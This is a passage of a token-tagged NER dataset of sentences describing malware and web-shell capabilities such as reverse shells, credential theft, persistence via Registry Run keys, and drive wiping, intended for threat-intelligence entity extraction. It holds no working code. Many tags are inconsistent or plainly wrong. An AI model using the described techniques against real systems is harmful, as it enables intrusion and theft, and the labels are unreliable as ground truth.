"O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "OwaAuth", - "has", - "a", - "command", - "to", - "timestop", - "a", - "file", - "or", - "directory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OwaAuth", - "uses", - "incoming", - "HTTP", - "requests", - "with", - "a", - "username", - "keyword", - "and", - "commands", - "and", - "handles", - "them", - "as", - "instructions", - "to", - "perform", - "actions." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OwaAuth", - "is", - "a", - "Web", - "shell", - "that", - "appears", - "to", - "be", - "exclusively", - "used", - "by", - "Threat", - "Group-3390.", - "It", - "is", - "installed", - "as", - "an", - "ISAPI", - "filter", - "on", - "Exchange", - "servers", - "and", - "shares", - "characteristics", - "with", - "the", - "China", - "Chopper", - "Web", - "shell." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "P.A.S.", - "Webshell", - "has", - "the", - "ability", - "to", - "create", - "reverse", - "shells", - "with", - "Perl", - "scripts." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "P.A.S.", - "Webshell", - "has", - "the", - "ability", - "to", - "list", - "and", - "extract", - "data", - "from", - "SQL", - "databases." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "P.A.S.", - "Webshell", - "has", - "the", - "ability", - "to", - "copy", - "files", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "P.A.S.", - "Webshell", - "can", - "use", - "a", - "decryption", - "mechanism", - "to", - "process", - "a", - "user", - "supplied", - "password", - "and", - "allow", - "execution." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "P.A.S.", - "Webshell", - "can", - "delete", - "scripts", - "from", - "a", - "subdirectory", - "of", - "/tmp", - "after", - "they", - "are", - "run." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "P.A.S.", - "Webshell", - "has", - "the", - "ability", - "to", - "list", - "files", - "and", - "file", - "characteristics", - "including", - "extension,", - "size,", - "ownership,", - "and", - "permissions." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "P.A.S.", - "Webshell", - "can", - "upload", - "and", - "download", - "files", - "to", - "and", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "P.A.S.", - "Webshell", - "has", - "the", - "ability", - "to", - "modify", - "file", - "permissions." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "P.A.S.", - "Webshell", - "can", - "display", - "the", - "/etc/passwd", - "file", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "P.A.S.", - "Webshell", - "can", - "scan", - "networks", - "for", - "open", - "ports", - "and", - "listening", - "services." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "P.A.S.", - "Webshell", - "can", - "use", - "encryption", - "and", - "base64", - "encoding", - "to", - "hide", - "strings", - "and", - "to", - "enforce", - "access", - "control", - "once", - "deployed." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "P.A.S.", - "Webshell", - "can", - "use", - "predefined", - "users", - "and", - "passwords", - "to", - "execute", - "brute", - "force", - "attacks", - "against", - "SSH,", - "FTP,", - "POP3,", - "MySQL,", - "MSSQL,", - "and", - "PostgreSQL", - "services." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "B-Way", - "B-Idus", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "P.A.S.", - "Webshell", - "can", - "list", - "PHP", - "server", - "configuration", - "details." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "P.A.S.", - "Webshell", - "can", - "issue", - "commands", - "via", - "HTTP", - "POST." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "P.A.S.", - "Webshell", - "can", - "gain", - "remote", - "access", - "and", - "execution", - "on", - "target", - "web", - "servers." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "B-Purp", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "P2P", - "ZeuS", - "added", - "junk", - "data", - "to", - "outgoing", - "UDP", - "packets", - "to", - "peer", - "implants." - ], - "ner_tags": [ - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "P8RAT", - "can", - "download", - "additional", - "payloads", - "to", - "a", - "target", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "P8RAT", - "can", - "send", - "randomly-generated", - "data", - "as", - "part", - "of", - "its", - "C2", - "communication." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "P8RAT", - "can", - "check", - "for", - "specific", - "processes", - "associated", - "with", - "virtual", - "environments." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "P8RAT", - "can", - "check", - "the", - "compromised", - "host", - "for", - "processes", - "associated", - "with", - "VMware", - "or", - "VirtualBox", - "environments." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "P8RAT", - "has", - "the", - "ability", - "to", - "\"sleep\"", - "for", - "a", - "specified", - "time", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PACEMAKER", - "can", - "enter", - "a", - "loop", - "to", - "read", - "`/proc/`", - "entries", - "every", - "2", - "seconds", - "in", - "order", - "to", - "read", - "a", - "target", - "application's", - "memory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PACEMAKER", - "can", - "parse", - "`/proc/\"process_name\"/cmdline`", - "to", - "look", - "for", - "the", - "string", - "`dswsd`", - "within", - "the", - "command", - "line." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PACEMAKER", - "has", - "written", - "extracted", - "data", - "to", - "`tmp/dsserver-check.statementcounters`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "PACEMAKER", - "has", - "the", - "ability", - "to", - "extract", - "credentials", - "from", - "OS", - "memory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PACEMAKER", - "can", - "use", - "PTRACE", - "to", - "attach", - "to", - "a", - "targeted", - "process", - "to", - "read", - "process", - "memory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PACEMAKER", - "can", - "use", - "a", - "simple", - "bash", - "script", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "PHOREAL", - "is", - "capable", - "of", - "manipulating", - "the", - "Registry." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "PHOREAL", - "communicates", - "via", - "ICMP", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "PHOREAL", - "is", - "capable", - "of", - "creating", - "reverse", - "shell." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "PITSTOP", - "has", - "the", - "ability", - "to", - "communicate", - "over", - "TLS." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PITSTOP", - "can", - "deobfuscate", - "base64", - "encoded", - "and", - "AES", - "encrypted", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PITSTOP", - "can", - "listen", - "over", - "the", - "Unix", - "domain", - "socket", - "located", - "at", - "`/data/runtime/cockpit/wd.fd`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PITSTOP", - "can", - "listen", - "and", - "evaluate", - "incoming", - "commands", - "on", - "the", - "domain", - "socket,", - "created", - "by", - "PITHOOK", - "malware,", - "located", - "at", - "`/data/runtime/cockpit/wd.fd`", - "for", - "a", - "predefined", - "magic", - "byte", - "sequence.", - "PITSTOP", - "can", - "then", - "duplicate", - "the", - "socket", - "for", - "further", - "communication", - "over", - "TLS." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PITSTOP", - "has", - "the", - "ability", - "to", - "receive", - "shell", - "commands", - "over", - "a", - "Unix", - "domain", - "socket." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "older", - "variant", - "of", - "PLAINTEE", - "performs", - "UAC", - "bypass." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLAINTEE", - "has", - "downloaded", - "and", - "executed", - "additional", - "plugins." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLAINTEE", - "uses", - "<code>reg", - "add</code>", - "to", - "add", - "a", - "Registry", - "Run", - "key", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLAINTEE", - "performs", - "the", - "<code>tasklist</code>", - "command", - "to", - "list", - "running", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLAINTEE", - "gains", - "persistence", - "by", - "adding", - "the", - "Registry", - "key", - "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "PLAINTEE", - "encodes", - "C2", - "beacons", - "using", - "XOR." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PLAINTEE", - "collects", - "general", - "system", - "enumeration", - "data", - "about", - "the", - "infected", - "machine", - "and", - "checks", - "the", - "OS", - "version." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLAINTEE", - "uses", - "the", - "<code>ipconfig", - "/all</code>", - "command", - "to", - "gather", - "the", - "victim’s", - "IP", - "address." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLAINTEE", - "uses", - "cmd.exe", - "to", - "execute", - "commands", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLEAD", - "has", - "the", - "ability", - "to", - "list", - "open", - "windows", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLEAD", - "has", - "the", - "ability", - "to", - "steal", - "saved", - "passwords", - "from", - "Microsoft", - "Outlook." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "B-Purp", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLEAD", - "can", - "harvest", - "saved", - "credentials", - "from", - "browsers", - "such", - "as", - "Google", - "Chrome,", - "Microsoft", - "Internet", - "Explorer,", - "and", - "Mozilla", - "Firefox." - ], - "ner_tags": [ - "B-Org", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "PLEAD", - "has", - "the", - "ability", - "to", - "delete", - "files", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLEAD", - "has", - "the", - "ability", - "to", - "list", - "drives", - "and", - "files", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLEAD", - "has", - "the", - "ability", - "to", - "upload", - "and", - "download", - "files", - "to", - "and", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLEAD", - "samples", - "were", - "found", - "to", - "be", - "highly", - "obfuscated", - "with", - "junk", - "code." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLEAD", - "has", - "been", - "executed", - "via", - "malicious", - "e-mail", - "attachments." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "PLEAD", - "has", - "been", - "executed", - "via", - "malicious", - "links", - "in", - "e-mails." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PLEAD", - "can", - "use", - "`ShellExecute`", - "to", - "execute", - "applications." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLEAD", - "has", - "the", - "ability", - "to", - "list", - "processes", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLEAD", - "has", - "the", - "ability", - "to", - "proxy", - "network", - "communications." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "PLEAD", - "has", - "used", - "RC4", - "encryption", - "to", - "download", - "modules." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLEAD", - "has", - "used", - "HTTP", - "for", - "communications", - "with", - "command", - "and", - "control", - "(C2)", - "servers." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PLEAD", - "has", - "the", - "ability", - "to", - "execute", - "shell", - "commands", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POORAIM", - "has", - "used", - "AOL", - "Instant", - "Messenger", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POORAIM", - "has", - "been", - "delivered", - "through", - "compromised", - "sites", - "acting", - "as", - "watering", - "holes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "POORAIM", - "can", - "conduct", - "file", - "browsing." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POORAIM", - "can", - "enumerate", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POORAIM", - "can", - "perform", - "screen", - "capturing." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POORAIM", - "can", - "identify", - "system", - "information,", - "including", - "battery", - "status." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POSHSPY", - "encrypts", - "C2", - "traffic", - "with", - "AES", - "and", - "RSA." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "POSHSPY", - "uploads", - "data", - "in", - "2048-byte", - "chunks." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POSHSPY", - "uses", - "a", - "DGA", - "to", - "derive", - "command", - "and", - "control", - "URLs", - "from", - "a", - "word", - "list." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POSHSPY", - "downloads", - "and", - "executes", - "additional", - "PowerShell", - "code", - "and", - "Windows", - "binaries." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POSHSPY", - "appends", - "a", - "file", - "signature", - "header", - "(randomly", - "selected", - "from", - "six", - "file", - "types)", - "to", - "encrypted", - "data", - "prior", - "to", - "upload", - "or", - "download." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POSHSPY", - "uses", - "PowerShell", - "to", - "execute", - "various", - "commands,", - "one", - "to", - "execute", - "its", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POSHSPY", - "modifies", - "timestamps", - "of", - "all", - "downloaded", - "executables", - "to", - "match", - "a", - "randomly", - "selected", - "file", - "created", - "prior", - "to", - "2013." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time" - ] - }, - { - "tokens": [ - "POSHSPY", - "uses", - "a", - "WMI", - "event", - "subscription", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSOURCE", - "uses", - "DNS", - "TXT", - "records", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSOURCE", - "has", - "been", - "observed", - "being", - "used", - "to", - "download", - "TEXTMATE", - "and", - "the", - "Cobalt", - "Strike", - "Beacon", - "payload", - "onto", - "victims." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "the", - "victim", - "is", - "using", - "PowerShell", - "3.0", - "or", - "later,", - "POWERSOURCE", - "writes", - "its", - "decoded", - "payload", - "to", - "an", - "alternate", - "data", - "stream", - "(ADS)", - "named", - "kernel32.dll", - "that", - "is", - "saved", - "in", - "<code>%PROGRAMDATA%\\Windows\\</code>." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "POWERSOURCE", - "is", - "a", - "PowerShell", - "backdoor." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "POWERSOURCE", - "queries", - "Registry", - "keys", - "in", - "preparation", - "for", - "setting", - "Run", - "keys", - "to", - "achieve", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSOURCE", - "achieves", - "persistence", - "by", - "setting", - "a", - "Registry", - "Run", - "key,", - "with", - "the", - "path", - "depending", - "on", - "whether", - "the", - "victim", - "account", - "has", - "user", - "or", - "administrator", - "access." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "has", - "encrypted", - "C2", - "traffic", - "with", - "RSA." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "POWERSTATS", - "has", - "used", - "useless", - "code", - "blocks", - "to", - "counter", - "analysis." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "uses", - "character", - "replacement,", - "PowerShell", - "environment", - "variables,", - "and", - "XOR", - "encoding", - "to", - "obfuscate", - "code.", - "POWERSTATS's", - "backdoor", - "code", - "is", - "a", - "multi-layer", - "obfuscated,", - "encoded,", - "and", - "compressed", - "blob.", - "POWERSTATS", - "has", - "used", - "PowerShell", - "code", - "with", - "custom", - "string", - "obfuscation" - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "can", - "use", - "DCOM", - "(targeting", - "the", - "127.0.0.1", - "loopback", - "address)", - "to", - "execute", - "additional", - "payloads", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "can", - "upload", - "files", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "can", - "deobfuscate", - "the", - "main", - "backdoor", - "code." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "can", - "disable", - "Microsoft", - "Office", - "Protected", - "View", - "by", - "changing", - "Registry", - "keys." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "POWERSTATS", - "can", - "use", - "DDE", - "to", - "execute", - "additional", - "payloads", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "has", - "connected", - "to", - "C2", - "servers", - "through", - "proxies." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "can", - "delete", - "all", - "files", - "on", - "the", - "C:\\,", - "D:\\,", - "E:\\", - "and,", - "F:\\", - "drives", - "using", - "PowerShell", - "Remove-Item", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "can", - "retrieve", - "and", - "execute", - "additional", - "PowerShell", - "payloads", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "can", - "use", - "JavaScript", - "code", - "for", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "can", - "retrieve", - "usernames", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "has", - "created", - "a", - "scheduled", - "task", - "named", - "\"MicrosoftEdge\"", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "can", - "use", - "Mshta.exe", - "to", - "execute", - "additional", - "payloads", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "uses", - "PowerShell", - "for", - "obfuscation", - "and", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "has", - "used", - "<code>get_tasklist</code>", - "to", - "discover", - "processes", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "has", - "established", - "persistence", - "through", - 